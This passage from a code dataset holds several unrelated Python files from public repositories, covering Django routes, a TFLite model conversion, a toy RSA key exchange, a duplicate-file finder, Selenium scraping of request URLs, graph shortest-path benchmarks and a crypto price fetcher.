%10.5f '\nprint('-' * (22 + 4 * (10 + 1)))\nprint(fmt % (method_2, xc_2, yc_2, R_2))\n\n\ndef plot_all(residu=False):\n plt.figure(facecolor='white') # figsize=(7, 5.4), dpi=72,\n plt.axis('equal')\n theta_fit = linspace(-pi, pi, 180)\n\n x_fit2 = xc_2 + R_2 * cos(theta_fit)\n y_fit2 = yc_2 + R_2 * sin(theta_fit)\n plt.plot(x_fit2, y_fit2, 'bo-', label=method_2, lw=2)\n plt.plot([xc_2], [yc_2], 'gD', mec='r', mew=1)\n\n plt.xlabel('x')\n plt.ylabel('y')\n\n plt.plot(x, y, 'ro', label='data', ms=8, mec='b', mew=1)\n plt.legend(loc='best', labelspacing=0.1)\n\nplot_all(residu=True)\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jockLeee/gap-detection","sub_path":"识别圆最小二乘.py","file_name":"识别圆最小二乘.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39861551778","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"students/register/\", views.StudentSignUpView.as_view(),\n name=\"student-register\"),\n path(\"student/profile/\", views.student_profile, name=\"student-profile\"),\n path(\"student/profile/complete/\", views.student_profile_completion,\n name=\"student-profile-complete\"),\n path(\"student/logout/\", views.logoutPage, name=\"logout\"),\n path(\"students/\", views.StudentListView.as_view(), name=\"student-list\"),\n # student's course\n\n path(\"students/courses/\", views.StudentCourseListView.as_view(),\n name=\"student-course-list\"),\n path(\"students/course//\",\n views.StudentCourseDetailView.as_view(), name=\"student-course-detail\"),\n path(\"student/course///\",\n views.StudentCourseDetailView.as_view(), name=\"student-course-detail-module\"),\n path(\"students/detail//\",\n views.student_detail_view, name=\"student-detail\"),\n\n path('student/semester/report/', views.semester_report, name=\"semester-report\"),\n path(\"student/general/report/\", views.general_report, name=\"general-report\"),\n]\n","repo_name":"alizada-hadi/Final_Pro","sub_path":"students/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6176166797","text":"# © 2020 - today Numigi (tm) and all its contributors (https://bit.ly/numigiens)\n# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).\n\nfrom odoo import api, fields, models\nfrom odoo.osv.expression import AND\n\n\nclass AccountInvoiceLine(models.Model):\n\n _inherit = \"account.invoice.line\"\n\n @api.model\n def _timesheet_domain_get_invoiced_lines(self, *args, **kwargs):\n domain = super()._timesheet_domain_get_invoiced_lines(*args, **kwargs)\n\n date_from = self._context.get(\"timesheet_date_from\")\n if date_from:\n domain = AND([domain, [('date', '>=', date_from)]])\n\n date_to = self._context.get(\"timesheet_date_to\")\n if date_to:\n domain = AND([domain, [('date', '<=', date_to)]])\n\n return domain\n","repo_name":"Numigi/odoo-sale-addons","sub_path":"sale_timesheet_invoicing_period/models/account_invoice_line.py","file_name":"account_invoice_line.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3394010081","text":"import tensorflow as tf\nimport os\nimport cv2\nimport numpy as np\n\ninput_mean = 127.5\ninput_std = 127.5\n\n\ndef representative_dataset_gen():\n # https://stackoverflow.com/questions/58775848/tflite-cannot-set-tensor-dimension-mismatch-on-model-conversion\n # https://stackoverflow.com/questions/75267305/how-can-i-pass-my-proper-normalisation-mean-std-values-used-in-training-to-the-t\n # https://stackoverflow.com/questions/1735025/how-to-normalize-a-numpy-array-to-within-a-certain-range\n for f_name in os.listdir('images'):\n file_path = os.path.normpath(os.path.join('images', f_name))\n img = cv2.imread(file_path)\n img = cv2.resize(img, (320, 320))\n img = 2. * (img - np.min(img)) / np.ptp(img) - 1\n img = np.reshape(img, (1, 320, 320, 3))\n image = img.astype(np.float32)\n yield [image]\n\n\nconverter = tf.lite.TFLiteConverter.from_saved_model('inference_graph_adam/saved_model')\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_dataset_gen\nconverter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]\nconverter.inference_input_type = tf.uint8\n# converter.inference_output_type = tf.int8 # alebo tf.uint8\n# converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, tf.lite.OpsSet.SELECT_TF_OPS]\ntflite_model = converter.convert()\n\nwith open('detect.tflite', 'wb') as f:\n f.write(tflite_model)\n","repo_name":"adam-ruzicka/Train-face-mask-detection-object-detection","sub_path":"convert_to_tflite.py","file_name":"convert_to_tflite.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28068172145","text":"import pandas as pd \nimport pickle \nimport numpy as np\nimport json\n\nfrom sklearn.model_selection import train_test_split\n\ndef split_dataset():\n\n\tdataset_path = \"train_fever_binary.json\"\n\tdataset = pd.read_json(dataset_path)\n\t# dataset = json.load(open(dataset_path, \"r\"))\n\t\n\ttrain, validate = train_test_split(dataset, test_size=0.1)\n\n\twith open('train_fever_binary_split.json', 'w') as outfile:\n\n\t\tjson.dump(train, outfile)\n\n\twith open('validate_fever_binary.json', 'w') as outfile:\n\n\t\tjson.dump(validate, outfile)\n\n\ndef create_dataset(dataset):\n\n\t\n\t\n\tlist_ = []\n\t\n\tcount = 0\n\tfor i in range(len(dataset)):\n\n\t\tdict_ = {}\n\t\tdict_[\"claim\"] = dataset[\"claim\"].iloc[i]\n\t\tdict_[\"triples\"] = dataset[\"triples\"].iloc[i]\n\t\tdict_[\"sentence\"] = dataset[\"sentence\"].iloc[i]\n\t\tif dataset[\"label\"].iloc[i] == 0 or dataset[\"label\"].iloc[i] == 1:\n\t\t\tdict_[\"label\"] = 0\n\t\telse:\n\t\t\tdict_[\"label\"] = 1\n\t\tlist_.append(dict_)\n\n\n\t# print (list_)\n\n\twith open('fever_binary.json', 'w') as outfile:\n\n\t\tjson.dump(list_, outfile)\n\n\nif __name__ == '__main__':\n\n \n\t\tdataset_path = \"../3-class/fever_3.json\"\n\t\tdataset = pd.read_json(dataset_path)\n\n\t\t# create_dataset(dataset)\n\t\tsplit_dataset()","repo_name":"DeFacto/EvidenceRetrieval-ClaimClassification","sub_path":"data/fever/binary/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"3511533426","text":"import random\r\nimport math\r\n\r\n\r\ndef miller_test(num, k=8):\r\n if num == 2 or num == 3:\r\n return True\r\n\r\n if num % 2 == 0:\r\n return False\r\n\r\n r, s = 0, num - 1\r\n while s % 2 == 0:\r\n r += 1\r\n s //= 2\r\n\r\n for _ in range(k):\r\n a = random.randrange(2, num - 1)\r\n x = pow(a, s, num)\r\n if x == 1 or x == num - 1:\r\n continue\r\n for _ in range(r - 1):\r\n x = pow(x, 2, num)\r\n if x == num - 1:\r\n break\r\n else:\r\n return False\r\n return True\r\n\r\n\r\ndef primary():\r\n bits = 256\r\n print(\"Not primary numbers\\n\")\r\n while True:\r\n prim_number = (random.randrange(2 ** (bits - 1), 2 ** bits))\r\n if not miller_test(prim_number):\r\n print(f\"{prim_number}\")\r\n else:\r\n return prim_number\r\n\r\n\r\ndef generete_key():\r\n while True:\r\n keys = []\r\n for _ in range(4):\r\n key = primary()\r\n keys.append(key)\r\n if keys[0] * keys[1] < keys[2] * keys[3]:\r\n return keys\r\n\r\n\r\ndef evclid_extended(first_number, second_number):\r\n if first_number == 0:\r\n return second_number, 0, 1\r\n else:\r\n div, koef_x, koef_y = evclid_extended(second_number % first_number, first_number)\r\n return div, koef_y - (second_number // first_number) * koef_x, koef_x\r\n\r\n\r\ndef mod_inverse(first_number, second_number):\r\n return list(evclid_extended(first_number, second_number))[1]\r\n\r\n\r\ndef rsa_key_pair(first_key, second_key):\r\n res = []\r\n n = first_key * second_key\r\n oiler = (first_key - 1) * (second_key - 1)\r\n e = random.randrange(2, oiler - 1)\r\n while math.gcd(e, oiler) != 1:\r\n e = random.randrange(2, oiler - 1)\r\n d = mod_inverse(e, oiler) % oiler\r\n res.append(d)\r\n res.append(n)\r\n res.append(e)\r\n return res\r\n\r\n\r\ndef encrypting(m, e, n):\r\n return pow(m, e, n)\r\n\r\n\r\ndef decryption(c, d, n):\r\n return pow(c, d, n)\r\n\r\n\r\ndef digital_sign(m, d, n):\r\n return pow(m, d, n)\r\n\r\n\r\ndef sign_check(m, s, e, n):\r\n return m == pow(s, e, n)\r\n\r\n\r\ndef key_send(k, d, e_1, n_1, n):\r\n k_1 = encrypting(k, e_1, n_1)\r\n s = digital_sign(k, d, n)\r\n s_1 = encrypting(s, e_1, n_1)\r\n return k_1, s_1\r\n\r\n\r\ndef key_receiving(key_1, s_1, d_1, n_1, e, n):\r\n key = decryption(key_1, d_1, n_1)\r\n s = decryption(s_1, d_1, n_1)\r\n if sign_check(key, s, e, n):\r\n return True, key\r\n else:\r\n return False, 0\r\n\r\n\r\ngen_keys = generete_key()\r\np, q, p_1, q_1 = gen_keys[0], gen_keys[1], gen_keys[2], gen_keys[3]\r\n\r\nrsa_keys_a = rsa_key_pair(p, q)\r\ne, n, d = rsa_keys_a[0], rsa_keys_a[1], rsa_keys_a[2]\r\n\r\nrsa_keys_b = rsa_key_pair(p_1, q_1)\r\ne_1, n_1, d_1 = rsa_keys_b[0], rsa_keys_b[1], rsa_keys_b[2]\r\n\r\n\r\nmessage = random.randint(0, n)\r\nstart_key = random.randint(0, n)\r\nencrypted_key, dig_sign = key_send(start_key, d, e_1, n_1, n)\r\n\r\nencrypted_msg = encrypting(message, e, n)\r\nreceived_key = key_receiving(encrypted_key, dig_sign, d_1, n_1, e, n)\r\ndecrypted_msg = decryption(encrypted_msg, d, n)\r\n\r\nprint(\"\\n㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛ Ключі персонажа А ㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛\")\r\nprint(f'e: {e}\\nn: {n}\\nd: {d}\\np: {p}\\nq: {q}\\n')\r\n\r\nprint(\"㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛ Ключі персонажа B ㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛㋛\")\r\nprint(f'e_1: {e_1}\\nn_1: {n_1}\\nd_1: {d_1}\\np_1: {p_1}\\nq_1: {q_1}\\n')\r\nprint(f'Start k: {start_key}\\nMessage: {message}\\n')\r\n\r\n\r\nif received_key[0]:\r\n print(f'The key has been received: {received_key[1]}\\n')\r\nif not received_key[0]:\r\n print('Error getting the key')\r\nprint(f\"Encrypted message: {encrypted_msg}\\nDecrypted: message: {decrypted_msg}\")\r\n","repo_name":"supermemez/crypto-22-23","sub_path":"cp4/semenow_chyrkov_fb-05_cp4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"40341652350","text":"# -*- coding: utf-8 -*-\n__author__ = 'Marcin Usielski'\n__copyright__ = 'Copyright (C) 2019, Nokia'\n__email__ = 'marcin.usielski@nokia.com'\n\nimport datetime\nimport re\n\nfrom moler.events.unix.genericunix_lineevent import GenericUnixLineEvent\n\n\nclass PrivateSystem(GenericUnixLineEvent):\n # There were 2 failed login attempts since the last successful login\n _re_warning = [\n re.compile(r\"You are about to access a private system. This system is for the use of\"),\n re.compile(r\"authorized users only. All connections are logged to the extent and by means\"),\n re.compile(r\"acceptable by the local legislation. Any unauthorized access or access\"),\n re.compile(r\"attempts may be punished to the fullest extent possible under the applicable\"),\n re.compile(r\"local legislation.\"),\n ]\n\n def __init__(self, connection, till_occurs_times=-1, runner=None):\n \"\"\"\n Event for check failed login attempts.\n\n :param connection: moler connection to device, terminal when command is executed\n :param till_occurs_times: number of event occurrence\n :param runner: Runner to run event\n \"\"\"\n super(PrivateSystem, self).__init__(connection=connection,\n runner=runner,\n till_occurs_times=till_occurs_times,\n detect_patterns=PrivateSystem._re_warning,\n match='all')\n\n self.process_full_lines_only = True\n\n\nEVENT_OUTPUT = \"\"\"\nYou are about to access a private system. This system is for the use of\nauthorized users only. All connections are logged to the extent and by means\nacceptable by the local legislation. Any unauthorized access or access\nattempts may be punished to the fullest extent possible under the applicable\nlocal legislation.\n\"\"\"\n\nEVENT_KWARGS = {\n \"till_occurs_times\": 1\n}\nEVENT_RESULT = [\n [\n {\n 'line': 'You are about to access a private system. This system is for the use of',\n 'matched': 'You are about to access a private system. This system is for the use of',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'authorized users only. All connections are logged to the extent and by means',\n 'matched': 'authorized users only. All connections are logged to the extent and by means',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'acceptable by the local legislation. Any unauthorized access or access',\n 'matched': 'acceptable by the local legislation. Any unauthorized access or access',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'attempts may be punished to the fullest extent possible under the applicable',\n 'matched': 'attempts may be punished to the fullest extent possible under the applicable',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n {\n 'line': 'local legislation.',\n 'matched': 'local legislation.',\n 'groups': (),\n 'named_groups': {},\n 'time': datetime.datetime(2019, 5, 17, 12, 42, 38, 278418)\n },\n ]\n]\n","repo_name":"nokia/moler","sub_path":"moler/events/unix/private_system.py","file_name":"private_system.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"37409708372","text":"from torch.optim.lr_scheduler import StepLR\n\n\nclass StepLRParams(object):\n\n def update_config_with_suggestion(self, config, suggestion):\n \"\"\"\n Given a SigOpt suggestion, update the lr_scheduler_args with StepLR params.\n\n :param config:\n - lr_scheduler_args: dict of lr arguments\n - optimizer_args: dict of optimizer arguments\n :param suggestion:\n - assignments (all optional)\n - gamma\n - step_size\n \"\"\"\n super().update_config_with_suggestion(config, suggestion)\n\n assignments = suggestion.assignments\n\n assert \"lr_scheduler_args\" in config\n assert \"lr_scheduler_class\" in config\n\n lr_scheduler_args = config[\"lr_scheduler_args\"]\n lr_scheduler_class = config[\"lr_scheduler_class\"]\n\n assert lr_scheduler_class == StepLR\n\n # lr_scheduler args\n if \"gamma\" in assignments:\n lr_scheduler_args[\"gamma\"] = assignments[\"gamma\"]\n\n if \"step_size\" in assignments:\n lr_scheduler_args[\"step_size\"] = assignments[\"step_size\"]\n\n @classmethod\n def get_execution_order(cls):\n eo = super().get_execution_order()\n eo[\"update_config_with_suggestion\"].append(\n \"StepLRParams.update_config_with_suggestion\"\n )\n return eo\n","repo_name":"numenta/nupic.research","sub_path":"packages/sigopt/src/nupic/research/frameworks/sigopt/mixins/step_lr_params.py","file_name":"step_lr_params.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"78"} +{"seq_id":"34966246740","text":"def file_name(file_dir):\n \"\"\"循环目录,将MR的灰度值归一化到[0,255]\"\"\"\n for root, dirs, files in os.walk(file_dir): \n for path in dirs:\n end_dirs = root +'/' + path\n # 对image进行重采样\n if 'T2' in end_dirs:\n imageName = end_dirs +'/Pre_N4_resam113_MR.nii' \n image= sitk.ReadImage(imageName) \n resacleFilter = sitk.RescaleIntensityImageFilter()\n resacleFilter.SetOutputMaximum(255)\n resacleFilter.SetOutputMinimum(0)\n image = resacleFilter.Execute(image)\n sitk.WriteImage(image, end_dirs+'/Pre_N4_resam113_norm_MR.nii') \n print(imageName) \n\nfile_name('A:/BaiduNetdiskDownload/tu xiang-zhao') \n\n","repo_name":"yangyunfeng-cyber/Medical_preprocess","sub_path":"image_normalize.py","file_name":"image_normalize.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74100475450","text":"import logging\nimport argparse\nfrom pathlib import Path\nfrom .helpers import log, write_file\nfrom .dupfinder import find_duplicates, deduplicate_content\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=(\n 'Finds duplicate files based on there content hash.'\n 'Outputs the results in a'\n )\n )\n parser.add_argument('directory', help='Base directory run search on')\n parser.add_argument(\n '-o', '--output',\n default='duplicates.json', action='store_true',\n help='Output results to a specified JSON file; default=duplicates.json'\n )\n parser.add_argument(\n '-d', '--dedup',\n action='store_true',\n help='Automatically deduplicate content. Backup is saved in \"./backup\"'\n )\n parser.add_argument(\n '-f', '--force',\n action='store_true',\n help='Force removal of files w/o making backup.'\n )\n parser.add_argument(\n '-v', '--verbose',\n action='store_true',\n help='Display verbose logs'\n )\n args = parser.parse_args()\n\n if args.verbose:\n log.setLevel(logging.DEBUG)\n log.debug('Debug mode enabled')\n\n try:\n base_dir = Path(args.directory).absolute()\n log.info('Checking files in {}'.format(base_dir))\n\n duplicates = find_duplicates(base_dir, args.verbose)\n\n if args.output:\n result_file_name = Path(args.output).absolute()\n\n log.info('Saving results to \"{}\"'.format(result_file_name))\n\n write_file(result_file_name, duplicates)\n\n if args.dedup:\n log.info('Deduplicating files...')\n backup_dir = None if args.force else './backup'\n\n if backup_dir:\n log.debug('removed duplicates will be backed up to \"./backup\"')\n deduplicate_content(duplicates, backup_dir)\n\n log.info('Done!')\n except Exception as exp:\n log.warn(exp)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yohannesHL/dupfinder","sub_path":"dupfinder/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9206825572","text":"from argparse import ArgumentParser\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom lkmeans.clustering import assign_to_cluster\nfrom lkmeans.data_generation.points_generator import generate_mix_distribution\nfrom lkmeans.distance import pairwise_minkowski_distance\nfrom lkmeans.examples.experiment_data import get_experiment_data\n\nparser = ArgumentParser()\n\nparser.add_argument(\n '--path',\n type=Path,\n default=Path('images'),\n help='Path to save results'\n)\n\nparser.add_argument(\n '--p',\n type=float,\n default=2,\n help='Minkowski parameter'\n)\n\nparser.add_argument(\n '--t',\n type=float,\n default=0.,\n help='T parameter of distribution'\n)\n\n\n# pylint: disable=too-many-locals\ndef main():\n args = parser.parse_args()\n args.path.mkdir(exist_ok=True)\n p = int(args.p) if (args.p).is_integer() else args.p\n\n dimension = 20\n n_points = 10\n n_observation = 10000\n\n n_clusters, prob, mu_list, cov_matrices = get_experiment_data(num_clusters=2, dimension=dimension)\n\n filename = args.path / f'plot_minkowski_function_with_p_{p}.png'\n samples, _, centroids = generate_mix_distribution(\n probability=prob,\n mu_list=mu_list,\n cov_matrices=cov_matrices,\n n_samples=n_points,\n t=0.1\n )\n\n dim = 0\n\n clusters, _ = assign_to_cluster(samples, centroids, n_clusters, p)\n cluster = np.array(clusters[0])\n dimension_data = cluster[:,dim]\n\n points = np.linspace(min(dimension_data), max(dimension_data), n_observation)\n minkowski_values = pairwise_minkowski_distance(\n point_a = dimension_data,\n points=points,\n p=p\n )\n\n fig, ax = plt.subplots(figsize=(5, 3))\n ax.scatter(points, minkowski_values)\n ax.axis('off')\n fig.savefig(str(filename), dpi=300, bbox_inches='tight')\n plt.close(fig)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alexgiving/LKMeans","sub_path":"lkmeans/report/plot_minkowski.py","file_name":"plot_minkowski.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4627504072","text":"from selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\ndef get_chromedriver():\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(f'--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36')\n # chrome_options.add_argument('--headless')\n # chrome_options.add_argument('--proxy-server=37.233.3.100:9999')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument('--auto-open-devtools-for-tabs=devtools://devtools/bundled/inspector.html')\n\n s = Service(\n executable_path=\"C:\\\\scrap_tutorial-master\\\\chromedriver.exe\"\n )\n driver = webdriver.Chrome(\n service=s,\n options=chrome_options\n )\n\n return driver\n\ndef main():\n url = \"https://www.meetmable.com/product/801442/18-chestnuts/beetroot-apple?variant=236574\"\n\n driver = get_chromedriver()\n # Загрузка страницы\n driver.get(url)\n # Ожидание загрузки страницы\n time.sleep(5)\n # Переключение на вкладку Network\n driver.execute_script('''\n var elements = document.querySelectorAll('[aria-label=\"Network panel\"]');\n for (var i = 0; i < elements.length; i++) {\n var element = elements[i];\n if (element.offsetWidth > 0 && element.offsetHeight > 0) {\n element.click();\n break;\n }\n }\n ''')\n\n # Ожидание загрузки списка запросов\n time.sleep(5)\n\n # Получение списка запросов\n requests = driver.execute_script('''\n var performanceEntries = performance.getEntriesByType(\"resource\");\n var fetchRequests = [];\n for (var i=0; i < performanceEntries.length; i++) {\n var entry = performanceEntries[i];\n if (entry.initiatorType === 'fetch' || entry.initiatorType === 'xmlhttprequest') {\n fetchRequests.push(entry);\n }\n }\n return fetchRequests;\n ''')\n urls_product = []\n # Вывод списка запросов\n for request in requests:\n if \"https://api.meetmable.com/v1/products/\" in request['name']:\n urls_product.append(request['name'])\n print('*'*100)\n print(urls_product)\n\n\n\n\n\n\n\n\n\n\n\n\n\n \"\"\"Рабочий\"\"\"\n # driver.execute_script('window.open(\"devtools://devtools/bundled/inspector.html\");')\n # driver.switch_to.window(driver.window_handles[-1])\n # driver.execute_script('window.network = performance.getEntriesByType(\"resource\").map((resource) => resource.name);')\n # requests = driver.execute_script('return window.network;')\n # print(requests)\n\n\nif __name__ == '__main__':\n main()","repo_name":"SashaZt/scrap_tutorial-master","sub_path":"meetmable_com/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75157115131","text":"l=[]\nmul=1\nn=int(input())\nlen=int(input())\nfor i in range(len):\n b=int(input())\n l=l+[b]\n mul=mul*b\nprint()\nprint(mul%n)\nprint(l)\nprint(max(l))\n\n\n\ndef ismonotronic(A):\n x,y=[],[]\n x.extend(A)\n y.extend(A)\n x.sort()\n y.sort(reverse=True)\n if(x==A or y==A):\n return True\n return False\nA=[4,9,6,8]\nprint(ismonotronic(A))\n\n\n ","repo_name":"amru1234/code-python","sub_path":"python/Pra.py","file_name":"Pra.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26305113925","text":"import os\nimport sys\nfrom time import time\nimport statistics\n\nmyPath = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, myPath + '/../')\n\nfrom graph.Graph import Graph\nfrom algorithms.quinca import *\nfrom algorithms.abm import *\nfrom algorithms.floyd_warshall import *\nfrom algorithms.eg import *\n\n\n## Data graph\nrepetitions = 10\nnum_nodes = 300\nnum_nodes_max = 301\nprobability_edges = 0.4\nmultliplicador = 1000\n\n\n\nfor num_notes_current in range(num_nodes, num_nodes_max):\n\n print(\"----------------------------------------------\")\n print(\"Nodes: \", num_notes_current)\n\n time_list_abm = []\n for i in range(repetitions):\n graph2 = Graph.creategraph(num_notes_current, probability_edges)\n result_before_dist2 = np.array(Floyd_Warshall(graph2))\n graph2.insert_worst_edge()\n\n ## Warm\n for i in range(5):\n dist111 = Quinca(graph2, result_before_dist2)\n dist1112 = ABM_Update(graph2, result_before_dist2)\n dist1113 = Even_Gazit(graph2, result_before_dist2)\n\n t2 = time()\n dist2 = ABM_Update(graph2, result_before_dist2)\n time_miliseconds2 = (time() - t2) * multliplicador\n time_list_abm.append(time_miliseconds2)\n print(\"abm: \", time_miliseconds2)\n\n print(\"==========ABM: \", statistics.mean(time_list_abm))\n\n ## QUINCA\n\n time_list_quinca = []\n for i in range(repetitions):\n graph = Graph.creategraph(num_notes_current, probability_edges)\n result_before_dist = np.array(Floyd_Warshall(graph))\n graph.insert_worst_edge()\n\n ## Warm\n for i in range(5):\n dist111 = Quinca(graph, result_before_dist)\n dist1112 = ABM_Update(graph, result_before_dist)\n dist1113 = Even_Gazit(graph, result_before_dist)\n\n t = time()\n dist = Quinca(graph, result_before_dist)\n time_miliseconds = (time() - t) * multliplicador\n time_list_quinca.append(time_miliseconds)\n print(\"Quinca: \", time_miliseconds)\n\n print(\"=======QUINCA: \", statistics.mean(time_list_quinca))\n\n\n time_list_eg = []\n for i in range(repetitions):\n graph3 = Graph.creategraph(num_notes_current, probability_edges)\n result_before_dist3 = np.array(Floyd_Warshall(graph3))\n graph3.insert_worst_edge()\n\n ## Warm\n for i in range(5):\n dist111 = Quinca(graph3, result_before_dist3)\n dist1112 = ABM_Update(graph3, result_before_dist3)\n dist1113 = Even_Gazit(graph3, result_before_dist3)\n\n t = time()\n dist = Even_Gazit(graph3, result_before_dist3)\n time_miliseconds3 = (time() - t) * multliplicador\n print(\"EG: \", time_miliseconds3)\n time_list_eg.append(time_miliseconds3)\n\n print(\"========EG: \", statistics.mean(time_list_eg))\n","repo_name":"arturoverbel/graph_presentation","sub_path":"scripts/quinca_vs_abm_strong.py","file_name":"quinca_vs_abm_strong.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"34236678460","text":"'''\nCreated on 17 févr. 2020\n\n@author: Fab\n'''\nfrom LMT.USV2.lib.USVUtil import sortVocInTime\nfrom LMT.USV2.lib.USVBurst import USVBurst\n\n\n\n\n'''\nThe burster creates burst from voc.\nIt takes a vocEventList as entry, and then create bursts \n'''\n\n\ndef createBurstFromVoc( eventTimeLineVoc, silenceBetweenBurstMs = 750 ):\n \n sortVocInTime( eventTimeLineVoc )\n \n burstList = []\n \n currentBurst = None\n \n for vocEvent in eventTimeLineVoc.eventList:\n \n if currentBurst != None: \n #rationale behind the division by 33: the difference between endFrame and startFrame is in frames, so the silenceBetweenBurstMs\n #should be converted into frames, and one frame lasts 33 ms\n if vocEvent.startFrame - currentBurst.getEndFrame() < silenceBetweenBurstMs/33:\n currentBurst.vocEventList.append( vocEvent )\n continue\n else:\n #burstList.append( currentBurst )\n currentBurst = None\n \n if currentBurst == None:\n \n currentBurst = USVBurst()\n burstList.append( currentBurst )\n currentBurst.vocEventList.append( vocEvent ) \n continue\n \n # indexing voc in burst:\n burstNumber = 0\n for burst in burstList:\n vocNumber=0\n for voc in burst.vocEventList:\n voc.metadata[\"vocNumber\"]= vocNumber\n voc.metadata[\"burstNumber\"]= burstNumber \n vocNumber+=1\n burstNumber+=1\n \n return burstList\n\n\nif __name__ == '__main__':\n \n pass\n ","repo_name":"fdechaumont/LMT-USV-Toolbox","sub_path":"LMT/USV2/lib/burster.py","file_name":"burster.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"5044750100","text":"import requests\nimport pandas as pd\nfrom utils.python_utils import str_to_dict\nfrom utils.yaml_utils import *\nfrom utils.colors import *\n\nURL_BASE = yaml_to_dict('ressources/path.yaml')\n\n\nclass Coin:\n def __init__(self, coin:str, hours=4):\n self.coin = coin\n self.hours = hours\n\n def get_price(self):\n currency = 'USDT'\n price = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/ticker/price?symbol={self.coin.upper()}{currency}')\n dic = str_to_dict(price.text)\n print(f\"{bcolors.BOLD}{self.coin}{bcolors.ENDC} ACTUAL PRICE :{bcolors.YELLOW} {dic['price']} {currency}\")\n return price\n\n def get_df(self, period=0, daily=False):\n if daily:\n r = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/klines?symbol=BTCUSDT&interval={self.hours}d')\n else:\n if self.coin == 'BTC':\n r = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/klines?symbol=BTCUSDT&interval={self.hours}h')\n else:\n r = requests.get(f'{URL_BASE[\"path\"][\"base_url\"]}/klines?symbol={self.coin.upper()}USDT&interval={self.hours}h')\n json_response = r.json()\n df = pd.DataFrame.from_dict(json_response)\n headers = ['OPEN_TIME', 'OPEN', 'HIGH', 'LOW', 'CLOSE', 'VOLUME', 'CLOSE_TIME', 'QUOTE_ASSET_VOLUME', 'NB_OF_TRADES', 'TAKER_BUY_BASE_ASSET_VOLUME', 'TAKER_BUY_QUOTE_ASSET_VOLUME', 'IGNORE']\n df.set_axis(headers, axis=1, inplace=True)\n return df[500-period:]\n\nif __name__ == '__main__':\n info = Coin('BTC')\n info.get_price()\n 